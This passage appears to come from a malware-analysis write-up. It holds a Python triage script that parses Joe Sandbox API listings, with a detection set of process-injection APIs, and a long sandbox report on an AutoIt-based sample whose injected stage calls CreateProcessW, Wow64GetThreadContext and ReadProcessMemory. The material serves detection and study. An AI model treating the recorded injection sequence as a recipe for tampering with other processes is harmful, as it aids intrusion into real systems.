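• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FD8629
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FD864B
Memory Dump Source
• Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
Similarity
• String ID:
• Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
APIs
  • Part of subcall function 003541A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003539FE,?,00000001), ref: 003541DB
• _free.LIBCMT ref: 003C36B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Similarity
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• Opcode ID: ed501be647fa589946237ec9b60fb97a8493a43ff00f096c71e85377d1d60862
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 0039C72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0039C746
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Similarity
• String ID: aut
• Opcode ID: 03b5a574cd1e26605e6280d87bfaf9b9c9e0bec71649ebc7af448022345331ce
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", optional comma, then "ref: <hex>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-F]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$")
HEX_ARG = re.compile(r"^[0-9A-F]{8}$")  # argument rendered as a raw 32-bit value
PROCESS_TAMPER = {  # heuristic set chosen for this example
    "CreateProcessW", "CreateProcessA", "GetThreadContext", "Wow64GetThreadContext",
    "SetThreadContext", "Wow64SetThreadContext", "ReadProcessMemory",
    "WriteProcessMemory", "ResumeThread", "NtUnmapViewOfSection"}


@dataclass
class FunctionEntry:
    apis: List[tuple] = field(default_factory=list)   # (name, module, args, ref)
    strings: List[str] = field(default_factory=list)  # literal args + "String ID" parts
    pe_backed: Optional[bool] = None
    offset: str = ""
    opcode_id: str = ""


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing into per-function entries; "Opcode ID" closes an entry."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Memory Dump Source") and cur.opcode_id:
            entries.append(cur)
            cur = FunctionEntry()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.apis.append((m["name"], m["module"], args, m["ref"]))
            cur.strings += [a for a in args if a != "?" and not HEX_ARG.match(a)]
            continue
        m = SRC_RE.match(line)
        if m:
            cur.pe_backed, cur.offset = m["pe"] == "true", m["offset"]
        elif line.startswith("• String ID:"):  # "$" separates the listed strings
            cur.strings += [s.strip() for s in line.split(":", 1)[1].split("$") if s.strip()]
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
    if cur.opcode_id or cur.apis:
        entries.append(cur)
    return entries


def triage(entries: List[FunctionEntry]) -> List[dict]:
    """Apply the heuristics; one dict per finding, in listing order."""
    findings = []
    for e in entries:
        tamper = sorted({a[0] for a in e.apis} & PROCESS_TAMPER)
        if len(tamper) >= 2:
            findings.append({"kind": "process_tampering", "offset": e.offset,
                             "pe_backed": e.pe_backed, "detail": tamper})
        if any("AUTOIT SCRIPT" in s for s in e.strings):
            findings.append({"kind": "autoit_script_marker", "offset": e.offset,
                             "pe_backed": e.pe_backed, "detail": ["AUTOIT SCRIPT"]})
        for name, _mod, args, _ref in e.apis:
            if name == "GetTempFileNameW" and len(args) > 1 and args[1] == "aut":
                findings.append({"kind": "autoit_temp_prefix", "offset": e.offset,
                                 "pe_backed": e.pe_backed, "detail": args})
    return findings


if __name__ == "__main__":
    for f in triage(parse_entries(SAMPLE)):
        print(f"{f['kind']:22} @ {f['offset']} pe_backed={f['pe_backed']} {f['detail']}")
```

Run against a full listing, the "pe_backed" field is what separates the interesting hit from noise: the same three APIs inside the AutoIt interpreter's own image at 00350000 would be unremarkable, while in an unbacked region at 00FD6000 they point at the injected stage the report's dynamic signatures describe.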
                                                                  APIs
                                                                    • Part of subcall function 00354517: _fseek.LIBCMT ref: 0035452F
                                                                    • Part of subcall function 0039C56D: _wcscmp.LIBCMT ref: 0039C65D
                                                                    • Part of subcall function 0039C56D: _wcscmp.LIBCMT ref: 0039C670
                                                                  • _free.LIBCMT ref: 0039C4DD
                                                                  • _free.LIBCMT ref: 0039C4E4
                                                                  • _free.LIBCMT ref: 0039C54F
                                                                    • Part of subcall function 00371C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00377A85), ref: 00371CB1
                                                                    • Part of subcall function 00371C9D: GetLastError.KERNEL32(00000000,?,00377A85), ref: 00371CC3
                                                                  • _free.LIBCMT ref: 0039C557
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                  • String ID:
                                                                  • API String ID: 1552873950-0
                                                                  • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                  • Instruction ID: 35632895f5dee093afebbf24ae65e424b2af297f8c9647f316eeb49262e8a094
                                                                  • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                  • Instruction Fuzzy Hash: 455190B1904218AFDF269F69DC81BADBBB9EF08304F00409EF64CA7251DB715A80CF19
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0039C72F
                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0039C746
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: 03b5a574cd1e26605e6280d87bfaf9b9c9e0bec71649ebc7af448022345331ce
                                                                  • Instruction ID: 22b7287fb098a854f5cd4251b719e791f667b38d86d7b07eccae494e78c25440
                                                                  • Opcode Fuzzy Hash: 03b5a574cd1e26605e6280d87bfaf9b9c9e0bec71649ebc7af448022345331ce
                                                                  • Instruction Fuzzy Hash: B0D05E7190030EABDB10AB90EC0EF8A7B6C9700704F0005A27690A50F1DAB4E6998B54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5323a1ec99a4d606b1f6aeffa2981b85672b8e57312e551fa3f9f3df6aeab42f
                                                                  • Instruction ID: 70a9cca4764cd36211a7e9785c93b3c1f895a792b8f577532db17874123b9ae2
                                                                  • Opcode Fuzzy Hash: 5323a1ec99a4d606b1f6aeffa2981b85672b8e57312e551fa3f9f3df6aeab42f
                                                                  • Instruction Fuzzy Hash: 8FF169716083019FCB12DF68C885B6AB7E5FF89314F14892EF9959B292D730E905CB82
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00355022
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003550CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell__memset
                                                                  • String ID:
                                                                  • API String ID: 928536360-0
                                                                  • Opcode ID: e99c290ee9bf9b4ae40d4c65c4bf45f74fb3865f1ce2640c11a5fd1faadf5f13
                                                                  • Instruction ID: 0dc21cfddab7b8acf3b6a373e3735538ce72e94772e5d4e623f0e88f58c63756
                                                                  • Opcode Fuzzy Hash: e99c290ee9bf9b4ae40d4c65c4bf45f74fb3865f1ce2640c11a5fd1faadf5f13
                                                                  • Instruction Fuzzy Hash: D93181B0505701DFC722DF34D855A9BBBE8FF48309F00492EEA9A87261E7717948CB96
                                                                  APIs
                                                                  • __FF_MSGBANNER.LIBCMT ref: 00373973
                                                                    • Part of subcall function 003781C2: __NMSG_WRITE.LIBCMT ref: 003781E9
                                                                    • Part of subcall function 003781C2: __NMSG_WRITE.LIBCMT ref: 003781F3
                                                                  • __NMSG_WRITE.LIBCMT ref: 0037397A
                                                                    • Part of subcall function 0037821F: GetModuleFileNameW.KERNEL32(00000000,00410312,00000104,00000000,00000001,00000000), ref: 003782B1
                                                                    • Part of subcall function 0037821F: ___crtMessageBoxW.LIBCMT ref: 0037835F
                                                                    • Part of subcall function 00371145: ___crtCorExitProcess.LIBCMT ref: 0037114B
                                                                    • Part of subcall function 00371145: ExitProcess.KERNEL32 ref: 00371154
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • RtlAllocateHeap.NTDLL(00F90000,00000000,00000001,00000001,00000000,?,?,0036F507,?,0000000E), ref: 0037399F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1372826849-0
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0039C385,?,?,?,?,?,00000004), ref: 0039C6F2
                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0039C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0039C708
                                                                  • CloseHandle.KERNEL32(00000000,?,0039C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0039C70F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleTime
                                                                  • String ID:
                                                                  • API String ID: 3397143404-0
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0039BB72
                                                                    • Part of subcall function 00371C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00377A85), ref: 00371CB1
                                                                    • Part of subcall function 00371C9D: GetLastError.KERNEL32(00000000,?,00377A85), ref: 00371CC3
                                                                  • _free.LIBCMT ref: 0039BB83
                                                                  • _free.LIBCMT ref: 0039BB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  APIs
                                                                    • Part of subcall function 003522A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003524F1), ref: 00352303
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003525A1
                                                                  • CoInitialize.OLE32(00000000), ref: 00352618
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003C503A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID:
                                                                  • API String ID: 3815369404-0
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 00353A73
                                                                    • Part of subcall function 00371405: __lock.LIBCMT ref: 0037140B
                                                                    • Part of subcall function 00353ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00353AF3
                                                                    • Part of subcall function 00353ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00353B08
                                                                    • Part of subcall function 00353D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00353AA3,?), ref: 00353D45
                                                                    • Part of subcall function 00353D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00353AA3,?), ref: 00353D57
                                                                    • Part of subcall function 00353D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00411148,00411130,?,?,?,?,00353AA3,?), ref: 00353DC8
                                                                    • Part of subcall function 00353D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00353AA3,?), ref: 00353E48
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00353AB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                  • String ID:
                                                                  • API String ID: 924797094-0
                                                                  APIs
                                                                  • ___lock_fhandle.LIBCMT ref: 0037EA29
                                                                  • __close_nolock.LIBCMT ref: 0037EA42
                                                                    • Part of subcall function 00377BDA: __getptd_noexit.LIBCMT ref: 00377BDA
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                  • String ID:
                                                                  • API String ID: 1046115767-0
                                                                  APIs
                                                                    • Part of subcall function 0037395C: __FF_MSGBANNER.LIBCMT ref: 00373973
                                                                    • Part of subcall function 0037395C: __NMSG_WRITE.LIBCMT ref: 0037397A
                                                                    • Part of subcall function 0037395C: RtlAllocateHeap.NTDLL(00F90000,00000000,00000001,00000001,00000000,?,?,0036F507,?,0000000E), ref: 0037399F
                                                                  • std::exception::exception.LIBCMT ref: 0036F51E
                                                                  • __CxxThrowException@8.LIBCMT ref: 0036F533
                                                                    • Part of subcall function 00376805: RaiseException.KERNEL32(?,?,0000000E,00406A30,?,?,?,0036F538,0000000E,00406A30,?,00000001), ref: 00376856
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3902256705-0
                                                                  APIs
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • __lock_file.LIBCMT ref: 00373629
                                                                    • Part of subcall function 00374E1C: __lock.LIBCMT ref: 00374E3F
                                                                  • __fclose_nolock.LIBCMT ref: 00373634
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00FD8593
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FD8629
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FD864B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  APIs
                                                                  • __flush.LIBCMT ref: 00372A0B
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: __flush__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 4101623367-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  APIs
                                                                    • Part of subcall function 00354214: FreeLibrary.KERNEL32(00000000,?), ref: 00354247
                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003539FE,?,00000001), ref: 003541DB
                                                                    • Part of subcall function 00354291: FreeLibrary.KERNEL32(00000000), ref: 003542C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Free$Load
                                                                  • String ID:
                                                                  • API String ID: 2391024519-0
                                                                  • Opcode ID: 34cd209c16d1900bd115e1359c76de2c3820cc00d274ea11c26e25a71656a545
                                                                  • Instruction ID: ecf6739283e47d6c5a50588a36d957935cbc7954fa1810d1f3a30f055cd8a4ab
                                                                  • Opcode Fuzzy Hash: 34cd209c16d1900bd115e1359c76de2c3820cc00d274ea11c26e25a71656a545
                                                                  • Instruction Fuzzy Hash: 5B11EB31600315AACB1AAB70DC16F9D77A99F40705F10882DFD96AE1E1DB70DA889B50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 7c0bc4b0b68d6edb5211066c7968099b5c49f30df7ee9d40805beef31d4de4c6
                                                                  • Instruction ID: f1e5debfba9a4a649cf5868ab8bd5da443085914371ce87905c15f184f41f6cf
                                                                  • Opcode Fuzzy Hash: 7c0bc4b0b68d6edb5211066c7968099b5c49f30df7ee9d40805beef31d4de4c6
                                                                  • Instruction Fuzzy Hash: B82157705086018FDB2ADF64C444B1BBBE1BF85304F158A6CEA964B665C732E845CF52
                                                                  APIs
                                                                  • ___lock_fhandle.LIBCMT ref: 0037AFC0
                                                                    • Part of subcall function 00377BDA: __getptd_noexit.LIBCMT ref: 00377BDA
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 1144279405-0
                                                                  • Opcode ID: faa8c95a7e1c2868b74749003246b58d895169cb2f20f0b71e86a82e0ac89eda
                                                                  • Instruction ID: eeab4ce25ffcc29a06ca8444e01b8109fdacc4664b4b8fc6b5e20f3872c3f0d1
                                                                  • Opcode Fuzzy Hash: faa8c95a7e1c2868b74749003246b58d895169cb2f20f0b71e86a82e0ac89eda
                                                                  • Instruction Fuzzy Hash: 0411B272805A049BD7336FA4CC4239DBA60AF81331F26C250E47C5F1E2C7BC8D108BA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                  • Instruction ID: 5c4beff52e2f9d00b4948871cf39c4d0a1b82133b3cc28d961577dea21b10be9
                                                                  • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                  • Instruction Fuzzy Hash: 6E01E67150010DAEDF0AEFA5C891CEEBB78AF11344F108169B9569B1A5EA309A8DDF60
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 00372AED
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2597487223-0
                                                                  • Opcode ID: 077ca2d7936788f5841a1cc4016289af1c38a33b885dd4a39772362efdac3d86
                                                                  • Instruction ID: 79ebaa8f849ddbdc27efeccdc9124190249fd438feb7a7cf6fb7a06261c73916
                                                                  • Opcode Fuzzy Hash: 077ca2d7936788f5841a1cc4016289af1c38a33b885dd4a39772362efdac3d86
                                                                  • Instruction Fuzzy Hash: EAF06D31D00609AADF73AF798C0779F7AA5BF00320F16C415B41C9E191DB7C8A62DB91
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,003539FE,?,00000001), ref: 00354286
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: 3b51cfae4fab4ed4393d5791ca347b09543f64730a5eb46e5dc38dbfec6fb51a
